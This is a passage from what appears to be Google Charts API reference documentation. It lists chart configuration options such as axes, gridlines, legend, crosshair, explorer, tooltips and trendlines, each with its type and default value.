This option is currently supported for area, bar, column, combo, line, and scatter charts. It is not supported by the Annotation Chart.

Type: object
Default: null

axisTitlesPosition

Where to place the axis titles, compared to the chart area. Supported values:
• in - Draw the axis titles inside the chart area.
• out - Draw the axis titles outside the chart area.
• none - Omit the axis titles.

Type: string
Default: 'out'

backgroundColor

The background color for the main area of the chart. Can be either a simple HTML color string, for example 'red' or '#00cc00', or an object with the following properties.

Type: string or object
Default: 'white'

backgroundColor.stroke

The color of the chart border, as an HTML color string.

Type: string
Default: '#666'

backgroundColor.strokeWidth

The border width, in pixels.

Type: number
Default: 0

backgroundColor.fill

The chart fill color, as an HTML color string.

Type: string
Default: 'white'

chartArea

An object with members to configure the placement and size of the chart area (where the chart itself is drawn, excluding axis and legends). Two formats are supported: a number, or a number followed by %. A simple number is a value in pixels; a number followed by % is a percentage. Example:

  chartArea: {left: 20, top: 0, width: '50%', height: '75%'}

Type: object
Default: null

chartArea.backgroundColor

Chart area background color. When a string is used, it can be either a hex string (e.g., '#fdc') or an English color name. When an object is used, the following properties can be provided:
• stroke: the color, provided as a hex string or English color name.
• strokeWidth: if provided, draws a border around the chart area of the given width (and with the color of stroke).

Type: string or object
Default: 'white'

chartArea.left

How far to draw the chart from the left border.

Type: number or string
Default: auto

chartArea.top

How far to draw the chart from the top border.

Type: number or string
Default: auto

chartArea.width

Chart area width.

Type: number or string
Default: auto

chartArea.height

Chart area height.

Type: number or string
Default: auto

colors

The colors to use for the chart elements. An array of strings, where each element is an HTML color string, for example: colors: ['red', '#004411'].

Type: Array of strings
Default: default colors

crosshair

An object containing the crosshair properties for the chart.

Type: object
Default: null

crosshair.color

The crosshair color, expressed as either a color name (e.g., "blue") or an RGB value (e.g., "#adf").

Type: string
Default: default

crosshair.focused

An object containing the crosshair properties upon focus. Example:

  crosshair: { focused: { color: '#3bc', opacity: 0.8 } }

Type: object
Default: default

crosshair.opacity

The crosshair opacity, with 0.0 being fully transparent and 1.0 fully opaque.

Type: number
Default: 1.0

crosshair.orientation

The crosshair orientation, which can be 'vertical' for vertical hairs only, 'horizontal' for horizontal hairs only, or 'both' for traditional crosshairs.
Type: string
Default: 'both'

crosshair.selected

An object containing the crosshair properties upon selection. Example:

  crosshair: { selected: { color: '#3bc', opacity: 0.8 } }

Type: object
Default: default

crosshair.trigger

When to display crosshairs: on 'focus', 'selection', or 'both'.

Type: string
Default: 'both'

curveType

Controls the curve of the lines when the line width is not zero. Can be one of the following:
• 'none' - Straight lines without curve.
• 'function' - The angles of the line will be smoothed.

Type: string
Default: 'none'

dataOpacity

The transparency of data points, with 1.0 being completely opaque and 0.0 fully transparent. In scatter, histogram, bar, and column charts, this refers to the visible data: dots in the scatter chart and rectangles in the others. In charts where selecting data creates a dot, such as the line and area charts, this refers to the circles that appear upon hover or selection. The combo chart exhibits both behaviors, and this option has no effect on other charts. (To change the opacity of a trendline, see trendline opacity.)

Type: number
Default: 1.0

enableInteractivity

Whether the chart throws user-based events or reacts to user interaction. If false, the chart will not throw 'select' or other interaction-based events (but will throw ready or error events), and will not display hovertext or otherwise change depending on user input.

Type: boolean
Default: true

explorer

The explorer option allows users to pan and zoom Google charts. explorer: {} provides the default explorer behavior, enabling users to pan horizontally and vertically by dragging, and to zoom in and out by scrolling. This feature is experimental and may change in future releases. A sketch combining the explorer options follows the entries below.

Note: The explorer only works with continuous axes (such as numbers or dates).

Type: object
Default: null

explorer.actions

The Google Charts explorer supports three actions:
• dragToPan: Drag to pan around the chart horizontally and vertically. To pan only along the horizontal axis, use explorer: { axis: 'horizontal' }. Similarly for the vertical axis.
• dragToZoom: The explorer's default behavior is to zoom in and out when the user scrolls. If explorer: { actions: ['dragToZoom', 'rightClickToReset'] } is used, dragging across a rectangular area zooms into that area. We recommend using rightClickToReset whenever dragToZoom is used. See explorer.maxZoomIn, explorer.maxZoomOut, and explorer.zoomDelta for zoom customizations.
• rightClickToReset: Right clicking on the chart returns it to the original pan and zoom level.

Type: Array of strings
Default: ['dragToPan', 'rightClickToReset']

explorer.axis

By default, users can pan both horizontally and vertically when the explorer option is used. If you want users to pan only horizontally, use explorer: { axis: 'horizontal' }. Similarly, explorer: { axis: 'vertical' } enables vertical-only panning.

Type: string
Default: both horizontal and vertical panning

explorer.keepInBounds

By default, users can pan all around, regardless of where the data is. To ensure that users don't pan beyond the original chart, use explorer: { keepInBounds: true }.

Type: boolean
Default: false

explorer.maxZoomIn

The maximum that the explorer can zoom in. By default, users will be able to zoom in enough that they'll see only 25% of the original view. Setting explorer: { maxZoomIn: .5 } would let users zoom in only far enough to see half of the original view.

Type: number
Default: 0.25

explorer.maxZoomOut

The maximum that the explorer can zoom out. By default, users will be able to zoom out far enough that the chart will take up only 1/4 of the available space. Setting explorer: { maxZoomOut: 8 } would let users zoom out far enough that the chart would take up only 1/8 of the available space.

Type: number
Default: 4

explorer.zoomDelta

When users zoom in or out, explorer.zoomDelta determines how much they zoom by. The smaller the number, the smoother and slower the zoom.

Type: number
Default: 1.5
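A minimal illustrative sketch (not from the original reference) combining the explorer options above: horizontal-only drag-to-zoom with a right-click reset and bounded panning:

  var options = {
    explorer: {
      actions: ['dragToZoom', 'rightClickToReset'],
      axis: 'horizontal',    // pan/zoom along the x-axis only
      keepInBounds: true,    // don't pan past the original data range
      maxZoomIn: 0.1         // allow zooming to 10% of the original view
    }
  };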
focusTarget

The type of the entity that receives focus on mouse hover. Also affects which entity is selected by mouse click, and which data table element is associated with events. Can be one of the following:
• 'datum' - Focus on a single data point. Correlates to a cell in the data table.
• 'category' - Focus on a grouping of all data points along the major axis. Correlates to a row in the data table.

In focusTarget 'category' the tooltip displays all the category values. This may be useful for comparing values of different series.

Type: string
Default: 'datum'

fontSize

The default font size, in pixels, of all text in the chart. You can override this using properties for specific chart elements.

Type: number
Default: automatic

fontName

The default font face for all text in the chart. You can override this using properties for specific chart elements.

Type: string
Default: 'Arial'

forceIFrame

Draws the chart inside an inline frame. (Note that on IE8, this option is ignored; all IE8 charts are drawn in i-frames.)

Type: boolean
Default: false

hAxis

An object with members to configure various horizontal axis elements. To specify properties of this object, you can use object literal notation, as shown here:

  { title: 'Hello', titleTextStyle: { color: '#FF0000' } }

Type: object
Default: null

hAxis.baseline

The baseline for the horizontal axis. This option is only supported for a continuous axis.

Type: number
Default: automatic

hAxis.baselineColor

The color of the baseline for the horizontal axis. Can be any HTML color string, for example: 'red' or '#00cc00'. This option is only supported for a continuous axis.

Type: string
Default: 'black'

hAxis.direction

The direction in which the values along the horizontal axis grow. Specify -1 to reverse the order of the values.

Type: 1 or -1
Default: 1

hAxis.format

A format string for numeric or date axis labels. For number axis labels, this is a subset of the decimal formatting ICU pattern set. For instance, {format: '#,###%'} will display values "1,000%", "750%", and "50%" for values 10, 7.5, and 0.5. You can also supply any of the following:
• {format: 'none'}: displays numbers with no formatting (e.g., 8000000)
• {format: 'decimal'}: displays numbers with thousands separators (e.g., 8,000,000)
• {format: 'scientific'}: displays numbers in scientific notation (e.g., 8e6)
• {format: 'currency'}: displays numbers in the local currency (e.g., $8,000,000.00)
• {format: 'percent'}: displays numbers as percentages (e.g., 800,000,000%)
• {format: 'short'}: displays abbreviated numbers (e.g., 8M)
• {format: 'long'}: displays numbers as full words (e.g., 8 million)

For date axis labels, this is a subset of the date formatting ICU pattern set. For instance, {format: 'MMM d, y'} will display the value "Jul 1, 2011" for the date of July first in 2011.

The actual formatting applied to the label is derived from the locale the API has been loaded with. For more details, see loading charts with a specific locale. This option is only supported for a continuous axis. A short sketch follows.

Type: string
Default: auto
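As an illustrative sketch (not from the original reference), a date-formatted x-axis combined with a currency-formatted y-axis (vAxis.format is documented further below) might look like this:

  var options = {
    hAxis: { format: 'MMM d, y' },   // date labels such as "Jul 1, 2011"
    vAxis: { format: 'currency' }    // locale-dependent currency labels
  };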
hAxis.gridlines

An object with members to configure the gridlines on the horizontal axis. To specify properties of this object, you can use object literal notation, as shown here:

  {color: '#333', count: 4}

This option is only supported for a continuous axis.

Type: object
Default: null

hAxis.gridlines.color

The color of the horizontal gridlines inside the chart area. Specify a valid HTML color string.

Type: string
Default: '#CCC'

hAxis.gridlines.count

The number of horizontal gridlines inside the chart area. Minimum value is 2. Specify -1 to automatically compute the number of gridlines.

Type: number
Default: 5

hAxis.gridlines.units

Overrides the default format for various aspects of date/datetime/timeofday data types when used with chart computed gridlines. Allows formatting for years, months, days, hours, minutes, seconds, and milliseconds. General format is:

  gridlines: {
    units: {
      years: {format: [/*format strings here*/]},
      months: {format: [/*format strings here*/]},
      days: {format: [/*format strings here*/]},
      hours: {format: [/*format strings here*/]},
      minutes: {format: [/*format strings here*/]},
      seconds: {format: [/*format strings here*/]},
      milliseconds: {format: [/*format strings here*/]}
    }
  }

Additional information can be found in Dates and Times.

Type: object
Default: null

hAxis.minorGridlines

An object with members to configure the minor gridlines on the horizontal axis, similar to the hAxis.gridlines option. This option is only supported for a continuous axis.

Type: object
Default: null

hAxis.minorGridlines.color

The color of the horizontal minor gridlines inside the chart area. Specify a valid HTML color string.

Type: string
Default: A blend of the gridline and background colors

hAxis.minorGridlines.count

The number of horizontal minor gridlines between two regular gridlines.

Type: number
Default: 0

hAxis.minorGridlines.units

Overrides the default format for various aspects of date/datetime/timeofday data types when used with chart computed minorGridlines. Allows formatting for years, months, days, hours, minutes, seconds, and milliseconds. The general format is the same as for hAxis.gridlines.units, shown above. Additional information can be found in Dates and Times.

Type: object
Default: null

hAxis.logScale

hAxis property that makes the horizontal axis a logarithmic scale (requires all values to be positive). Set to true for yes. This option is only supported for a continuous axis.

Type: boolean
Default: false

hAxis.scaleType

hAxis property that makes the horizontal axis a logarithmic scale. Can be one of the following:
• null - No logarithmic scaling is performed.
• 'log' - Logarithmic scaling. Negative and zero values are not plotted. This option is the same as setting hAxis: { logScale: true }.
• 'mirrorLog' - Logarithmic scaling in which negative and zero values are plotted. The plotted value of a negative number is the negative of the log of the absolute value. Values close to 0 are plotted on a linear scale.

This option is only supported for a continuous axis.

Type: string
Default: null

hAxis.textPosition

Position of the horizontal axis text, relative to the chart area. Supported values: 'out', 'in', 'none'. A combined sketch of several hAxis options follows.

Type: string
Default: 'out'
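A minimal illustrative sketch (not from the original reference) combining some of the hAxis options above:

  var options = {
    hAxis: {
      scaleType: 'log',                      // logarithmic x-axis
      gridlines: {color: '#333', count: 4},
      minorGridlines: {count: 1},            // one minor gridline between majors
      textPosition: 'in'                     // draw labels inside the chart area
    }
  };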
hAxis.textStyle

An object that specifies the horizontal axis text style. The object has this format:

  {
    color: <string>,
    fontName: <string>,
    fontSize: <number>,
    bold: <boolean>,
    italic: <boolean>
  }

The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize.

Type: object
Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>}

hAxis.ticks

Replaces the automatically generated X-axis ticks with the specified array. Each element of the array should be either a valid tick value (such as a number, date, datetime, or timeofday), or an object. If it's an object, it should have a v property for the tick value, and an optional f property containing the literal string to be displayed as the label. Examples:
• hAxis: { ticks: [5, 10, 15, 20] }
• hAxis: { ticks: [{v: 32, f: 'thirty two'}, {v: 64, f: 'sixty four'}] }
• hAxis: { ticks: [new Date(2014, 3, 15), new Date(2013, 5, 15)] }
• hAxis: { ticks: [16, {v: 32, f: 'thirty two'}, {v: 64, f: 'sixty four'}, 128] }

This option is only supported for a continuous axis.

Type: Array of elements
Default: auto

hAxis.title

hAxis property that specifies the title of the horizontal axis.

Type: string
Default: null

hAxis.titleTextStyle

An object that specifies the horizontal axis title text style. The object has this format:

  {
    color: <string>,
    fontName: <string>,
    fontSize: <number>,
    bold: <boolean>,
    italic: <boolean>
  }

The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize.

Type: object
Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>}

hAxis.allowContainerBoundaryTextCufoff

If false, will hide outermost labels rather than allow them to be cropped by the chart container. If true, will allow label cropping. This option is only supported for a discrete axis.

Type: boolean
Default: false

hAxis.slantedText

If true, draw the horizontal axis text at an angle, to help fit more text along the axis; if false, draw horizontal axis text upright. Default behavior is to slant text if it cannot all fit when drawn upright. Notice that this option is available only when the hAxis.textPosition is set to 'out' (which is the default). This option is only supported for a discrete axis.

Type: boolean
Default: automatic

hAxis.slantedTextAngle

The angle of the horizontal axis text, if it's drawn slanted. Ignored if hAxis.slantedText is false, or is in auto mode, and the chart decided to draw the text horizontally. This option is only supported for a discrete axis.

Type: number, 1-90
Default: 30

hAxis.maxAlternation

Maximum number of levels of horizontal axis text. If axis text labels become too crowded, the server might shift neighboring labels up or down in order to fit labels closer together. This value specifies the maximum number of levels to use; the server can use fewer levels if labels can fit without overlapping. This option is only supported for a discrete axis.

Type: number
Default: 2

hAxis.maxTextLines

Maximum number of lines allowed for the text labels. Labels can span multiple lines if they are too long, and the number of lines is, by default, limited by the height of the available space. This option is only supported for a discrete axis.

Type: number
Default: auto

hAxis.minTextSpacing

Minimum horizontal spacing, in pixels, allowed between two adjacent text labels.
If the labels are spaced too densely, or they are too long, the spacing can drop below this threshold, and in this case one of the label-unclutter measures will be applied (e.g., truncating the labels or dropping some of them). This option is only supported for a discrete axis.

Type: number
Default: The value of hAxis.textStyle.fontSize

hAxis.showTextEvery

How many horizontal axis labels to show, where 1 means show every label, 2 means show every other label, and so on. Default is to try to show as many labels as possible without overlapping. This option is only supported for a discrete axis.

Type: number
Default: automatic

hAxis.maxValue

Moves the max value of the horizontal axis to the specified value; this will be rightward in most charts. Ignored if this is set to a value smaller than the maximum x-value of the data. hAxis.viewWindow.max overrides this property. This option is only supported for a continuous axis.

Type: number
Default: automatic

hAxis.minValue

Moves the min value of the horizontal axis to the specified value; this will be leftward in most charts. Ignored if this is set to a value greater than the minimum x-value of the data. hAxis.viewWindow.min overrides this property. This option is only supported for a continuous axis.

Type: number
Default: automatic

hAxis.viewWindowMode

Specifies how to scale the horizontal axis to render the values within the chart area. The following string values are supported:
• 'pretty' - Scale the horizontal values so that the maximum and minimum data values are rendered a bit inside the left and right of the chart area. This will cause hAxis.viewWindow.min and hAxis.viewWindow.max to be ignored.
• 'maximized' - Scale the horizontal values so that the maximum and minimum data values touch the left and right of the chart area. This will cause hAxis.viewWindow.min and hAxis.viewWindow.max to be ignored.
• 'explicit' - A deprecated option for specifying the left and right scale values of the chart area. (Deprecated because it's redundant with hAxis.viewWindow.min and hAxis.viewWindow.max.) Data values outside these values will be cropped. You must specify an hAxis.viewWindow object describing the maximum and minimum values to show.

This option is only supported for a continuous axis.

Type: string
Default: Equivalent to 'pretty', but hAxis.viewWindow.min and hAxis.viewWindow.max take precedence if used.

hAxis.viewWindow

Specifies the cropping range of the horizontal axis. A short sketch follows the two entries below.

Type: object
Default: null

hAxis.viewWindow.max

• For a continuous axis: The maximum horizontal data value to render.
• For a discrete axis: The zero-based row index where the cropping window ends. Data points at this index and higher will be cropped out. In conjunction with hAxis.viewWindow.min, it defines a half-opened range [min, max) that denotes the element indices to display. In other words, every index such that min <= index < max will be displayed.

Ignored when hAxis.viewWindowMode is 'pretty' or 'maximized'.

Type: number
Default: auto

hAxis.viewWindow.min

• For a continuous axis: The minimum horizontal data value to render.
• For a discrete axis: The zero-based row index where the cropping window begins. Data points at indices lower than this will be cropped out. In conjunction with hAxis.viewWindow.max, it defines a half-opened range [min, max) that denotes the element indices to display. In other words, every index such that min <= index < max will be displayed.

Ignored when hAxis.viewWindowMode is 'pretty' or 'maximized'.

Type: number
Default: auto
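An illustrative sketch (not from the original reference) cropping a continuous horizontal axis to a fixed range with an explicit view window:

  var options = {
    hAxis: {
      viewWindowMode: 'explicit',
      viewWindow: { min: 10, max: 40 }   // render only the x-range from 10 to 40
    }
  };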
height

Height of the chart, in pixels.

Type: number
Default: height of the containing element

interpolateNulls

Whether to guess the value of missing points. If true, it will guess the value of any missing data based on neighboring points. If false, it will leave a break in the line at the unknown point. This is not supported by Area charts with the isStacked: true/'percent'/'relative'/'absolute' option.

Type: boolean
Default: false

legend

An object with members to configure various aspects of the legend. To specify properties of this object, you can use object literal notation, as shown here:

  {position: 'top', textStyle: {color: 'blue', fontSize: 16}}

Type: object
Default: null

legend.alignment

Alignment of the legend. Can be one of the following:
• 'start' - Aligned to the start of the area allocated for the legend.
• 'center' - Centered in the area allocated for the legend.
• 'end' - Aligned to the end of the area allocated for the legend.

Start, center, and end are relative to the style (vertical or horizontal) of the legend. For example, in a 'right' legend, 'start' and 'end' are at the top and bottom, respectively; for a 'top' legend, 'start' and 'end' would be at the left and right of the area, respectively.

The default value depends on the legend's position. For 'bottom' legends, the default is 'center'; other legends default to 'start'.

Type: string
Default: automatic

legend.maxLines

Maximum number of lines in the legend. Set this to a number greater than one to add lines to your legend. Note: The exact logic used to determine the actual number of lines rendered is still in flux. This option currently works only when legend.position is 'top'.

Type: number
Default: 1

legend.position

Position of the legend. Can be one of the following:
• 'bottom' - Below the chart.
• 'left' - To the left of the chart, provided the left axis has no series associated with it. So if you want the legend on the left, use the option targetAxisIndex: 1.
• 'in' - Inside the chart, by the top left corner.
• 'none' - No legend is displayed.
• 'right' - To the right of the chart. Incompatible with the vAxes option.
• 'top' - Above the chart.

Type: string
Default: 'right'

legend.textStyle

An object that specifies the legend text style. The object has this format:

  {
    color: <string>,
    fontName: <string>,
    fontSize: <number>,
    bold: <boolean>,
    italic: <boolean>
  }

The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize.

Type: object
Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>}

lineDashStyle

The on-and-off pattern for dashed lines. For instance, [4, 4] will repeat 4-length dashes followed by 4-length gaps, and [5, 1, 3] will repeat a 5-length dash, a 1-length gap, a 3-length dash, a 5-length gap, a 1-length dash, and a 3-length gap. See Dashed Lines for more information. A short styling sketch follows the pointShape entry below.

Type: Array of numbers
Default: null

lineWidth

Data line width in pixels. Use zero to hide all lines and show only the points. You can override values for individual series using the series property.

Type: number
Default: 2

orientation

The orientation of the chart. When set to 'vertical', rotates the axes of the chart so that (for instance) a column chart becomes a bar chart, and an area chart grows rightward instead of up.

Type: string
Default: 'horizontal'

pointShape

The shape of individual data elements: 'circle', 'triangle', 'square', 'diamond', 'star', or 'polygon'. See the points documentation for examples.

Type: string
Default: 'circle'
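An illustrative sketch (not from the original reference) combining the line and point styling options above:

  var options = {
    lineDashStyle: [4, 4],   // dashed lines: 4 on, 4 off
    lineWidth: 2,
    pointShape: 'diamond',
    pointSize: 5             // documented below; points are hidden when 0
  };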
pointSize

Diameter of displayed points in pixels. Use zero to hide all points. You can override values for individual series using the series property. If you're using a trendline, the pointSize option will affect the width of the trendline unless you override it with the trendlines.n.pointSize option.

Type: number
Default: 0

pointsVisible

Determines whether points will be displayed. Set to false to hide all points. You can override values for individual series using the series property. If you're using a trendline, the pointsVisible option will affect the visibility of the points on all trendlines unless you override it with the trendlines.n.pointsVisible option.

This can also be overridden using the style role in the form of "point {visible: true}".

Type: boolean
Default: true

reverseCategories

If set to true, will draw series from right to left. The default is to draw left-to-right. This option is only supported for a discrete major axis.

Type: boolean
Default: false

selectionMode

When selectionMode is 'multiple', users may select multiple data points.

Type: string
Default: 'single'

series

An array of objects, each describing the format of the corresponding series in the chart. To use default values for a series, specify an empty object {}. If a series or a value is not specified, the global value will be used. Each object supports the following properties:
• annotations - An object to be applied to annotations for this series. This can be used to control, for instance, the textStyle for the series:

    series: {
      0: {
        annotations: {
          textStyle: {fontSize: 12, color: 'red'}
        }
      }
    }

  See the various annotations options for a more complete list of what can be customized.
• color - The color to use for this series. Specify a valid HTML color string.
• curveType - Overrides the global curveType value for this series.
• labelInLegend - The description of the series to appear in the chart legend.
• lineDashStyle - Overrides the global lineDashStyle value for this series.
• lineWidth - Overrides the global lineWidth value for this series.
• pointShape - Overrides the global pointShape value for this series.
• pointSize - Overrides the global pointSize value for this series.
• pointsVisible - Overrides the global pointsVisible value for this series.
• targetAxisIndex - Which axis to assign this series to, where 0 is the default axis, and 1 is the opposite axis. Default value is 0; set to 1 to define a chart where different series are rendered against different axes. At least one series must be allocated to the default axis. You can define a different scale for different axes.
• visibleInLegend - A boolean value, where true means that the series should have a legend entry, and false means that it should not. Default is true.

You can specify either an array of objects, each of which applies to the series in the order given, or you can specify an object where each child has a numeric key indicating which series it applies to.
For example, the following two declarations are identical, and declare the first series as black and absent from the legend, and the fourth as red and absent from the legend:

  series: [
    {color: 'black', visibleInLegend: false},
    {},
    {},
    {color: 'red', visibleInLegend: false}
  ]

  series: {
    0: {color: 'black', visibleInLegend: false},
    3: {color: 'red', visibleInLegend: false}
  }

Type: Array of objects, or object with nested objects
Default: {}

theme

A theme is a set of predefined option values that work together to achieve a specific chart behavior or visual effect. Currently only one theme is available:
• 'maximized' - Maximizes the area of the chart, and draws the legend and all of the labels inside the chart area. Sets the following options:

    chartArea: {width: '100%', height: '100%'},
    legend: {position: 'in'},
    titlePosition: 'in',
    axisTitlesPosition: 'in',
    hAxis: {textPosition: 'in'},
    vAxis: {textPosition: 'in'}

Type: string
Default: null

title

Text to display above the chart.

Type: string
Default: no title

titlePosition

Where to place the chart title, compared to the chart area. Supported values:
• in - Draw the title inside the chart area.
• out - Draw the title outside the chart area.
• none - Omit the title.

Type: string
Default: 'out'

titleTextStyle

An object that specifies the title text style. The object has this format:

  {
    color: <string>,
    fontName: <string>,
    fontSize: <number>,
    bold: <boolean>,
    italic: <boolean>
  }

The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize.

Type: object
Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>}

tooltip

An object with members to configure various tooltip elements. To specify properties of this object, you can use object literal notation, as shown here:

  {textStyle: {color: '#FF0000'}, showColorCode: true}

Type: object
Default: null

tooltip.ignoreBounds

If set to true, allows the drawing of tooltips to flow outside of the bounds of the chart on all sides. Note: This only applies to HTML tooltips. If this is enabled with SVG tooltips, any overflow outside of the chart bounds will be cropped. See Customizing Tooltip Content for more details.

Type: boolean
Default: false

tooltip.isHtml

If set to true, use HTML-rendered (rather than SVG-rendered) tooltips. See Customizing Tooltip Content for more details. Note: customization of the HTML tooltip content via the tooltip column data role is not supported by the Bubble Chart visualization.

Type: boolean
Default: false

tooltip.showColorCode

If true, show colored squares next to the series information in the tooltip. The default is true when focusTarget is set to 'category', otherwise the default is false.

Type: boolean
Default: automatic

tooltip.textStyle

An object that specifies the tooltip text style. The object has this format:

  {
    color: <string>,
    fontName: <string>,
    fontSize: <number>,
    bold: <boolean>,
    italic: <boolean>
  }

The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize.

Type: object
Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>}

tooltip.trigger

The user interaction that causes the tooltip to be displayed (a short sketch combining the tooltip options follows this entry):
• 'focus' - The tooltip will be displayed when the user hovers over the element.
• 'none' - The tooltip will not be displayed.
• 'selection' - The tooltip will be displayed when the user selects the element.

Type: string
Default: 'focus'
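An illustrative sketch (not from the original reference) combining the tooltip options above with the selection options documented earlier:

  var options = {
    selectionMode: 'multiple',        // allow multi-select
    aggregationTarget: 'category',    // roll selections up by x-value
    tooltip: {isHtml: true, trigger: 'selection'}
  };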
trendlines

Displays trendlines on the charts that support them. By default, linear trendlines are used, but this can be customized with the trendlines.n.type option. Trendlines are specified on a per-series basis, so most of the time your options will look like this:

  var options = {
    trendlines: {
      0: {
        type: 'linear',
        color: 'green',
        lineWidth: 3,
        opacity: 0.3,
        showR2: true,
        visibleInLegend: true
      }
    }
  };

Type: object
Default: null

trendlines.n.color

The color of the trendline, expressed as either an English color name or a hex string.

Type: string
Default: default series color

trendlines.n.degree

For trendlines of type: 'polynomial', the degree of the polynomial (2 for quadratic, 3 for cubic, and so on). (The default degree may change from 3 to 2 in an upcoming release of Google Charts.)

Type: number
Default: 3

trendlines.n.labelInLegend

If set, the trendline will appear in the legend as this string.

Type: string
Default: null

trendlines.n.lineWidth

The line width of the trendline, in pixels.

Type: number
Default: 2

trendlines.n.opacity

The transparency of the trendline, from 0.0 (transparent) to 1.0 (opaque).

Type: number
Default: 1.0

trendlines.n.pointSize

Trendlines are constructed by stamping a bunch of dots on the chart; this rarely-needed option lets you customize the size of the dots. The trendline's lineWidth option will usually be preferable. However, you'll need this option if you're using the global pointSize option and want a different point size for your trendlines.

Type: number
Default: 1

trendlines.n.pointsVisible

Trendlines are constructed by stamping a bunch of dots on the chart. The trendline's pointsVisible option determines whether the points for a particular trendline are visible.

Type: boolean
Default: true

trendlines.n.showR2

Whether to show the coefficient of determination in the legend or trendline tooltip.

Type: boolean
Default: false

trendlines.n.type

Whether the trendline is 'linear' (the default), 'exponential', or 'polynomial'.

Type: string
Default: linear

trendlines.n.visibleInLegend

Whether the trendline equation appears in the legend. (It will appear in the trendline tooltip.)

Type: boolean
Default: false

vAxes

Specifies properties for individual vertical axes, if the chart has multiple vertical axes. Each child object is a vAxis object, and can contain all the properties supported by vAxis. These property values override any global settings for the same property.

To specify a chart with multiple vertical axes, first define a new axis using series.targetAxisIndex, then configure the axis using vAxes. The following example assigns series 2 to the right axis and specifies a custom title and text style for it:

  {
    series: {
      2: {
        targetAxisIndex: 1
      }
    },
    vAxes: {
      1: {
        title: 'Losses',
        textStyle: {color: 'red'}
      }
    }
  }

This property can be either an object or an array: the object is a collection of objects, each with a numeric label that specifies the axis that it defines (this is the format shown above); the array is an array of objects, one per axis. For example, the following array-style notation is identical to the vAxis object shown above:

  vAxes: [
    {},  // Nothing specified for axis 0
    {
      title: 'Losses',
      textStyle: {color: 'red'}  // Axis 1
    }
  ]

Type: Array of object, or object with child objects
Default: null

vAxis

An object with members to configure various vertical axis elements. To specify properties of this object, you can use object literal notation, as shown here:

  {title: 'Hello', titleTextStyle: {color: '#FF0000'}}

Type: object
Default: null

vAxis.baseline

vAxis property that specifies the baseline for the vertical axis.
If the baseline is larger than the highest grid line or smaller than the lowest grid line, it will be rounded to the closest gridline.

Type: number
Default: automatic

vAxis.baselineColor

Specifies the color of the baseline for the vertical axis. Can be any HTML color string, for example: 'red' or '#00cc00'.

Type: string
Default: 'black'

vAxis.direction

The direction in which the values along the vertical axis grow. Specify -1 to reverse the order of the values.

Type: 1 or -1
Default: 1

vAxis.format

A format string for numeric axis labels. This is a subset of the ICU pattern set. For instance, {format: '#,###%'} will display values "1,000%", "750%", and "50%" for values 10, 7.5, and 0.5. You can also supply any of the following:
• {format: 'none'}: displays numbers with no formatting (e.g., 8000000)
• {format: 'decimal'}: displays numbers with thousands separators (e.g., 8,000,000)
• {format: 'scientific'}: displays numbers in scientific notation (e.g., 8e6)
• {format: 'currency'}: displays numbers in the local currency (e.g., $8,000,000.00)
• {format: 'percent'}: displays numbers as percentages (e.g., 800,000,000%)
• {format: 'short'}: displays abbreviated numbers (e.g., 8M)
• {format: 'long'}: displays numbers as full words (e.g., 8 million)

The actual formatting applied to the label is derived from the locale the API has been loaded with. For more details, see loading charts with a specific locale.

Type: string
Default: auto

vAxis.gridlines

An object with members to configure the gridlines on the vertical axis. To specify properties of this object, you can use object literal notation, as shown here:

  {color: '#333', count: 4}

Type: object
Default: null

vAxis.gridlines.color

The color of the vertical gridlines inside the chart area. Specify a valid HTML color string.

Type: string
Default: '#CCC'

vAxis.gridlines.count

The number of vertical gridlines inside the chart area. Minimum value is 2. Specify -1 to automatically compute the number of gridlines.

Type: number
Default: 5

vAxis.gridlines.units

Overrides the default format for various aspects of date/datetime/timeofday data types when used with chart computed gridlines. Allows formatting for years, months, days, hours, minutes, seconds, and milliseconds. General format is:

  gridlines: {
    units: {
      years: {format: [/*format strings here*/]},
      months: {format: [/*format strings here*/]},
      days: {format: [/*format strings here*/]},
      hours: {format: [/*format strings here*/]},
      minutes: {format: [/*format strings here*/]},
      seconds: {format: [/*format strings here*/]},
      milliseconds: {format: [/*format strings here*/]}
    }
  }

Additional information can be found in Dates and Times.

Type: object
Default: null

vAxis.minorGridlines

An object with members to configure the minor gridlines on the vertical axis, similar to the vAxis.gridlines option.

Type: object
Default: null

vAxis.minorGridlines.color

The color of the vertical minor gridlines inside the chart area. Specify a valid HTML color string.

Type: string
Default: A blend of the gridline and background colors

vAxis.minorGridlines.count

The number of vertical minor gridlines between two regular gridlines.

Type: number
Default: 0

vAxis.minorGridlines.units

Overrides the default format for various aspects of date/datetime/timeofday data types when used with chart computed minorGridlines. Allows formatting for years, months, days, hours, minutes, seconds, and milliseconds.
vAxis.minorGridlines.units
Overrides the default format for various aspects of date/datetime/timeofday data types when used with chart computed minorGridlines. Allows formatting for years, months, days, hours, minutes, seconds, and milliseconds. General format is:

gridlines: {
  units: {
    years: {format: [/*format strings here*/]},
    months: {format: [/*format strings here*/]},
    days: {format: [/*format strings here*/]},
    hours: {format: [/*format strings here*/]},
    minutes: {format: [/*format strings here*/]},
    seconds: {format: [/*format strings here*/]},
    milliseconds: {format: [/*format strings here*/]}
  }
}

Additional information can be found in Dates and Times. Type: object. Default: null.

vAxis.logScale
If true, makes the vertical axis a logarithmic scale. Note: All values must be positive. Type: boolean. Default: false.

vAxis.scaleType
vAxis property that makes the vertical axis a logarithmic scale. Can be one of the following:
• null - No logarithmic scaling is performed.
• 'log' - Logarithmic scaling. Negative and zero values are not plotted. This option is the same as setting vAxis: { logScale: true }.
• 'mirrorLog' - Logarithmic scaling in which negative and zero values are plotted. The plotted value of a negative number is the negative of the log of the absolute value. Values close to 0 are plotted on a linear scale.
This option is only supported for a continuous axis. Type: string. Default: null.

vAxis.textPosition
Position of the vertical axis text, relative to the chart area. Supported values: 'out', 'in', 'none'. Type: string. Default: 'out'.

vAxis.textStyle
An object that specifies the vertical axis text style. The object has this format:
{ color: <string>, fontName: <string>, fontSize: <number>, bold: <boolean>, italic: <boolean> }
